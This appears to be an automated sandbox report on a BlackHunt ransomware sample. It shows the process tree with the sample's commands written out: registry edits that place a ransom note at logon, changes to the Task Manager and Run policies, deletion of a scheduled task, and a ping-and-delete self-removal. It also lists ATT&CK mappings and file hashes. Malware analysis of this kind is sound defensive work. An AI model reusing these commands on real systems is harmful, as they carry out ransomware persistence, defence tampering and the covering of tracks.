C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:4348
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:2364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1916
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:7720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:7256
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:8068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:7568
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:4756
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5268
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe"2⤵PID:704
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:6696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:7388 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:5664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:7948
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:6448
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6728
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5752
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2140
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:6380
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4376
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59b104d6615ff02e395c9a973b9c13844
SHA1ce9190a94a9c9360ab3eab50dc9fc30d24a19f29
SHA2562d949e1c9aad3ed1c07c9196da0fb4534bfc80a43bd36d8d6d291b500eb07771
SHA51243439107069daeecd23d57b008ab85c68eceb66d307b3f04231b7c9f244c7901fcc45ffe9896b7b1f2687525c230d07cf02d7fa29bcaa73e207c02d64976ca12
-
Filesize
12KB
MD5a8b5d74c2b8ee0789aaed238b3b83dcd
SHA1e894a2b9fc5b55a4f0d4210e52bea887241848c7
SHA2567a47249abfe86e721d99e7487f81f79c8ac13672f4351d31c069b96b1be9e87f
SHA51228a670ecf9720475e48271604492e757f716c42c91bcefc766f82ca0710388b857475960319e8c43b36a0b4e71b2e3d506ab0db2c30c3b8ceae4f9d27df04850
-
Filesize
684B
MD5a7d9361e7e62a06eee0d11f2c9d70582
SHA151f0b6395e8ce27c9203a788dc5fa8d45231bc3a
SHA256e0dcc93524b3400ab4d61652820b117276fdd9a4f4fee9bdfd4f39d5f5359553
SHA5121b940a70edc34ccb575c1ee1b8618407e7db05077f655f97dcf8672ee902423e3bf6bb25d3fafe463156564099e3f0d2e8cb61a2b559122317d682decb713d73